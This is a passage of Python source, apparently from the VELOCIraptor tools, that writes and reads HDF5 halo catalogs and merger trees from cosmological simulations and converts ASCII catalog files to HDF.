ibuildheadtail=0, icombinefile=1):
"""
    produces a unified HDF5 formatted file containing the full catalog plus information to walk the tree
    \ref BuildTemporalHeadTail must have been called beforehand, otherwise it is called here.
    Code produces either a single combined file or one file per snapshot (see icombinefile)
    The keys are the same as those contained in the halo catalog dictionary with the addition of
    Num_of_snaps, and similar header info contained in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
\todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
totnumhalos=sum(numhalos)
if (icombinefile==1):
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
#simulation box size
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=(numsnaps-1-i)
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halodata[i].keys():
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
else:
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'w')
hdffile.create_dataset("Snap_value",data=np.array([numsnaps-1-i],dtype=np.uint32))
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("NHalos",data=np.array([numhalos[i]],dtype=np.uint64))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("scalefactor",data=np.array([atime[i]],dtype=np.float64))
for key in halodata[i].keys():
hdffile.create_dataset(key,data=halodata[i][key])
hdffile.close()
hdffile=h5py.File(fname+".tree.hdf.data",'w')
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("NHalos",data=np.array([numhalos],dtype=np.uint64))
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
for key in tree[i].keys():
"""
#to be completed for progenitor list
if (key=="Progen"):
for j in range(numhalos[i]):
halogrp=snapgrp.create_group("Halo"+str(j))
halogrp.create_dataset(key,data=tree[i][key][j])
else:
snapgrp.create_dataset(key,data=tree[i][key])
"""
if ((key=="Progen") | (key=="Descen")): continue
snapgrp.create_dataset(key,data=tree[i][key])
hdffile.close()
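#Hedged usage sketch (assumed file name): read back one snapshot of the combined file written
#above with icombinefile=1; group and attribute names mirror those created in
#ProduceUnifiedTreeandHaloCatalog.
def _example_read_unified_catalog(fname, snap):
    """Illustrative: load one snapshot group of a unified catalog into a dictionary."""
    hdffile = h5py.File(fname + ".snap.hdf.data", 'r')
    snapgrp = hdffile["Snap_%03d" % snap]
    data = {key: np.array(snapgrp[key]) for key in snapgrp.keys()}
    nhalos = snapgrp.attrs["NHalos"]
    hdffile.close()
    return data, nhalos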
def ProduceCombinedUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0,ibuildmajormergers=0, TEMPORALHALOIDVAL=1000000000000):
"""
Produces a unified HDF5 formatted file containing the full catalog plus the information needed to walk the tree.
#ref BuildTemporalHeadTail must have been called beforehand; otherwise it is called here when ibuildheadtail=1.
The code produces a single combined file rather than one file per snapshot.
The keys are the same as those contained in the halo catalog dictionary, with the addition of
Num_of_snaps and similar header info contained in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups.
#todo don't know if I should use multiprocessing here to write files in parallel; IO might not be ideal
Here halodata is the dictionary containing the halo information.
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
if (ibuildmajormergers==1):
IdentifyMergers(numsnaps,tree,numhalos,halodata,cosmodata['BoxSize'],cosmodata['Hubble_param'],atime) #box size and Hubble parameter taken from cosmodata (boxsize/hval were previously undefined here)
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
#simulation box size
headergrp.attrs["BoxSize"]=cosmodata["BoxSize"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
if (key!='BoxSize'): cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
#now have finished with header
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
treekeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "Num_progen"]
for i in range(numsnaps):
#note that the snapshots are normally stored in reverse order (last snapshot listed first), so keep that in mind when traversing the groups
snapgrp=snapsgrp.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
#now close file and use the pytables interface so as to write the table
hdffile.close()
#now write tables using pandas interface
for i in range(numsnaps):
#lets see if we can alter the code to write a table
keys=list(halodata[i].keys()) #need a list copy so tree keys can be removed below
#remove tree keys
for tkey in treekeys: keys.remove(tkey)
#make temp dict
dictval=dict()
for key in keys:
dictval[key]=halodata[i][key]
#make a pandas DataFrame using halo dictionary
df=pd.DataFrame.from_dict(dictval)
df.to_hdf(fname+".snap.hdf.data","Snapshots/Snap_%03d/Halos"%(numsnaps-1-i), format='table', mode='a')
#reopen with h5py interface
hdffile=h5py.File(fname+".snap.hdf.data",'a')
#then write tree information in separate group
treegrp=hdffile.create_group("MergerTree")
#Tree group should contain
"""
HaloSnapID
HaloSnapNum
HaloSnapIndex
ProgenitorIndex
ProgenitorSnapnum
ProgenitorID
DescendantIndex
..
..
RootProgenitorIndex
..
..
RootDescendantIndex
"""
#to save on memory, allocate each block separately
#store halo information
tothalos=sum(numhalos)
tdata=np.zeros(tothalos,dtype=halodata[0]["ID"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["ID"]
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapID",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=i
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapNum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=range(int(numhalos[i]))
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["Tail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Tail"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["TailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["TailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Tail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["Head"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Head"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["HeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["HeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Head"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("DescendantIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTail"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootTail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHead"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHead"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootHead"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantIndex",data=tdata)
#store number of progenitors
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Num_progen"]
count+=int(numhalos[i])
treegrp.create_dataset("NProgen",data=tdata)
hdffile.close()
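#Illustrative sketch (not part of the original tools): the Progenitor/Descendant index datasets above
#assume temporal halo IDs of the form ID = snapnum*TEMPORALHALOIDVAL + index + 1, which is why the index
#is recovered as ID%TEMPORALHALOIDVAL-1. A temporal ID can therefore be decoded as:
def DecodeTemporalHaloID(haloid, TEMPORALHALOIDVAL=1000000000000):
    """Helper added for illustration only: return the (snapshot, index) pair encoded in a temporal halo ID."""
    snap = int(haloid // TEMPORALHALOIDVAL)
    index = int(haloid % TEMPORALHALOIDVAL) - 1
    return snap, index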
def ReadUnifiedTreeandHaloCatalog(fname, desiredfields=[], icombinedfile=1,iverbose=1):
"""
Read the unified tree and halo catalog from the HDF file(s) with base filename fname.
Parameters
----------
fname : string
base filename of the HDF file(s) written by the routines above
desiredfields : list
if non-empty, only these halo properties are read
icombinedfile : int
whether the catalog was written as a single combined file (1) or as one file per snapshot (0)
iverbose : int
verbosity flag
Returns
-------
atime, tree, numhalos, halodata, cosmodata, unitdata
"""
if (icombinedfile):
hdffile=h5py.File(fname+".snap.hdf.data",'r')
#load data sets containing number of snaps
headergrpname="Header/"
numsnaps=hdffile[headergrpname].attrs["NSnaps"]
#allocate memory
halodata=[dict() for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
cosmodata=dict()
unitdata=dict()
#load cosmology data
cosmogrpname="Cosmology/"
fieldnames=[str(n) for n in hdffile[headergrpname+cosmogrpname].attrs.keys()]
for fieldname in fieldnames:
cosmodata[fieldname]=hdffile[headergrpname+cosmogrpname].attrs[fieldname]
#load unit data
unitgrpname="Units/"
fieldnames=[str(n) for n in hdffile[headergrpname+unitgrpname].attrs.keys()]
for fieldname in fieldnames:
unitdata[fieldname]=hdffile[headergrpname+unitgrpname].attrs[fieldname]
#for each snap load the appropriate group
start=time.time()
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
if (iverbose==1):
print("Reading ",snapgrpname)
isnap=hdffile[snapgrpname].attrs["Snapnum"]
atime[isnap]=hdffile[snapgrpname].attrs["scalefactor"]
numhalos[isnap]=hdffile[snapgrpname].attrs["NHalos"]
if (len(desiredfields)>0):
fieldnames=desiredfields
else:
fieldnames=[str(n) for n in hdffile[snapgrpname].keys()]
for catvalue in fieldnames:
halodata[isnap][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
else :
hdffile=h5py.File(fname+".snap_000.hdf.data",'r')
numsnaps=int(hdffile["NSnaps"][0])
#get field names
fieldnames=[str(n) for n in hdffile.keys()]
#clean of header info (the per-snapshot files store the snapshot number as "Snap_value")
fieldnames.remove("Snap_value")
fieldnames.remove("NSnaps")
fieldnames.remove("NHalos")
fieldnames.remove("TotalNHalos")
fieldnames.remove("scalefactor")
if (len(desiredfields)>0):
fieldnames=desiredfields
hdffile.close()
halodata=[[] for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
#the per-snapshot files store no cosmology or unit information, so return empty dicts
cosmodata=dict()
unitdata=dict()
start=time.time()
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'r')
atime[i]=(hdffile["scalefactor"])[0]
numhalos[i]=(hdffile["NHalos"])[0]
halodata[i]=dict()
for catvalue in fieldnames:
halodata[i][catvalue]=np.array(hdffile[catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
#lets ignore the tree file for now
for i in range(numsnaps):
tree[i]=dict()
return atime,tree,numhalos,halodata,cosmodata,unitdata
if (icombinedfile==1):
hdffile=h5py.File(fname+".tree.hdf.data",'r')
treefields=["haloID", "Num_progen"]
#to be completed for the Progenitor list, although the information is contained in the halo catalog by searching for haloes with the same Head
#treefields=["haloID", "Num_progen", "Progen"]
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
tree[i]=dict()
for catvalue in treefields:
"""
if (catvalue==treefields[-1]):
tree[i][catvalue]=[[]for j in range(numhalos[i])]
for j in range(numhalos[i]):
halogrpname=snapgrpname+"/Halo"+str(j)
tree[i][catvalue]=np.array(hdffile[halogrpname+catvalue])
else:
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
"""
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
return atime,tree,numhalos,halodata,cosmodata,unitdata
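#Minimal usage sketch (the base filename and desired fields below are placeholders):
#    atime,tree,numhalos,halodata,cosmodata,unitdata=ReadUnifiedTreeandHaloCatalog(
#        "treecatalog", desiredfields=["ID","Head","Tail"], icombinedfile=1, iverbose=0)
#With icombinedfile=1 this expects "treecatalog.snap.hdf.data" and "treecatalog.tree.hdf.data"
#as written by the routines above; with icombinedfile=0 it expects "treecatalog.snap_XXX.hdf.data" files.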
def ProduceHDFTree(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False}
):
"""
Produces an HDF5 formatted file containing Reduced Tree information,
ie; RootHead, Head, HeadSnap, Tail, RootTail, etc.
Parameters
----------
fname : string
filename of the hdf file to be written
numsnaps : int
the number of snapshots
tree : dict
the tree data
numhalos : array
array of number of halos per snapshot
halodata : dict
the halo data dictionary
atime : array
array of scalefactors/times of the snapshots
descripdata : dict
stores a description of how the tree catalogue was produced
Returns
-------
void :
Only writes an hdf file. Nothing is returned.
"""
hdffile=h5py.File(fname,'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
halokeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
for i in range(numsnaps):
#note that the snapshots are normally stored in reverse order (last snapshot listed first), so keep that in mind when traversing the groups
snapgrp=snapsgrp.create_group("Snap_%03d"%i)
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halokeys:
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
"""
Conversion Tools
"""
def ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor properties files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".properties"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".properties"
hdffilename=basefilename+".hdf.properties"
else:
filename=basefilename+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf.properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".properties"
hdffilename=basefilename+".hdf"+".sublevels"+".properties"
else:
filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
def ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII catalog_groups file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading catalog_groups file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_groups"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".catalog_groups"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
fieldnames=["Group_Size","Offset","Offset_unbound","Number_of_substructures_in_halo","Parent_halo_ID"]
fieldtype=[np.uint32,np.uint64,np.uint64,np.uint32,np.int64]
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_groups"
hdffilename=basefilename+".hdf.catalog_groups"
else:
filename=basefilename+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf.catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
#will look like one dimensional array of values split into
#"Group_Size"
#"Offset"
#"Offset_unbound"
#"Number_of_substructures_in_halo"
#"Parent_halo_ID"
#each of size numhalos
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_groups"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"
else:
filename=basefilename+".sublevels"+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
def ConvertASCIICatalogParticleFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII catalog_particles file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading catalog_particles file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
